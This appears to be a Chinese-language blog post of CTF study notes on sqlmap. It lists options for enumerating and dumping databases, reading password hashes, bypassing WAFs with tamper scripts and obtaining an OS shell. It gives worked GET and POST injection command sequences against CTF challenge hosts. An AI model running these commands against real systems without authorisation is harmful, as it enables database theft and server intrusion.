SQLmap的使用
本文最后更新于77 天前,其中的信息可能已经过时,如有错误请发送邮件到1416359402@qq.com

sqlmap的使用

90%的SQL注入漏洞挖掘靠它!SQLMap详细使用指南-CSDN博客

GET注入

指定url

-u 参数,指定需要检测的url,单/双引号包裹。中间如果有提示,就输入y。或 –batch

-D 指定目标「数据库」,单/双引号包裹,常配合其他参数使用。

-T 指定目标「表」,单/双引号包裹,常配合其他参数使用。

-C 指定目标「字段」,单/双引号包裹,常配合其他参数使用。

--dbs 获取数据库
--current-db  当前库
--tables 获取表
--columns  获取字段             (不指定表名,默认获取当前数据库中所有表的字段)
--dump  获取值,也就是表中的数据。可以指定具体的库、表、字段

--users 获取数据库的所有用户名。
--passwords 获取所有数据库用户的密码(哈希值)
--is-dba 判断当前登录的用户是不是数据库的管理员账号。
--tamper 指定绕过脚本,绕过WAF或ids等
--search 搜索数据库中是否存在指定库/表/字段,需要指定库名/表名/字段名
--os-shell  获取操作系统交互式 Shell(需 DBA 权限
--tamper=space2comment  绕过waf避免空格被过滤

--batch (默认确认)不再询问是否确认
--level=1 执行测试的等级(1-5,默认为1,常用3)
--risk=1 风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。

示例:

遇到这种?id=1

直接蹦出username

发现和别的sql注入不一样

用sqlmap直接跑

sqlmap -u http://challenge.qsnctf.com:47549/?id=1 --dbs
查找数据库
sqlmap -u http://challenge.qsnctf.com:47549/?id=1 -D ctf --tables


sqlmap -u http://challenge.qsnctf.com:47549/?id=1 -D ctf -T flag --dump

拿到flag

POST注入

操作步骤:

  1. 输入任意账号密码,点击登录,Burp Suite 捕获 POST 请求。
  2. 将完整请求(包括 Headers)复制保存为 1.txt
sqlmap.py -r 1.txt -p username --dbs
sqlmap -u "     " --data "user=admin&pass=*" 
参数作用
-r 1.txt读取保存的请求包
-p username指定要测试的参数(可避免扫描所有字段)
--dbs获取所有数据库

查看当前数据库

sqlmap -r 1.txt -p username --current-db            

获取所有数据库

sqlmap -r 1.txt  -p username --dbs --batch

获取当前库的所有表

sqlmap -r 1.txt -p username -D security --tables --batch

查看某表字段信息

sqlmap -r 1.txt -p username -D security -T users --columns --batch

导出字段内容

sqlmap -r 1.txt -p username -D security -T users -C username,password  --dump  --batch

示例:

抓包

注意(sqlmap跑包时从当前文件1.txt中打开终端)

跑库名:

sqlmap -r 1.txt --dbs --batch  --tamper=space2comment           (当有waf时加上--tamper)

跑表名:

sqlmap -r 1.txt -D web2 --tables  --batch  --tamper=space2comment   (当有waf时加上--tamper)

跑字段:

sqlmap -r 1.txt -D web2 -T flag --columns  --batch --tamper=space2comment       (当有waf时加上--tamper)

得到flag

sqlmap -r 1.txt -D web2 -T flag -C flag --dump  --batch --tamper=space2comment      (当有waf时加上--tamper)

–os-shell获取操作系统

sqlmap -u http://challenge.qsnctf.com:54969/?id=1 --os-shell  --batch
cat /flag

文末附加内容
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇